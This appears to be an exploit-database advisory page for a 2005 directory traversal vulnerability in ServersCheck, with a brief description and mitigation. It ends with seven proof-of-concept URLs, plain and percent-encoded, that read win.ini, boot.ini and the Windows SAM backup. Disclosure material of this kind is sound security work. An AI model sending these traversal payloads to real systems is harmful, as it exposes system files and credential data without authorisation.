ServersCheck Directory Traversal Vulnerability

vendor:

ServersCheck

by:

SecurityFocus

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: ServersCheck

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

ServersCheck Directory Traversal Vulnerability

ServersCheck is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to disclose arbitrary files on an affected computer in the context of the affected application. This may aid in further attacks against the underlying system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13810/info

ServersCheck is affected by a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to disclose arbitrary files on an affected computer in the context of the affected application. This may aid in further attacks against the underlying system. 

http://www.example.com:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
http://www.example.com:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
http://www.example.com:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
http://www.example.com:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://www.example.com:1272/../../ ../../../../../../../boot.ini
http://www.example.com:1272/../../../../../../../../boot.ini
http://www.example.com:1272/../../../../boot.ini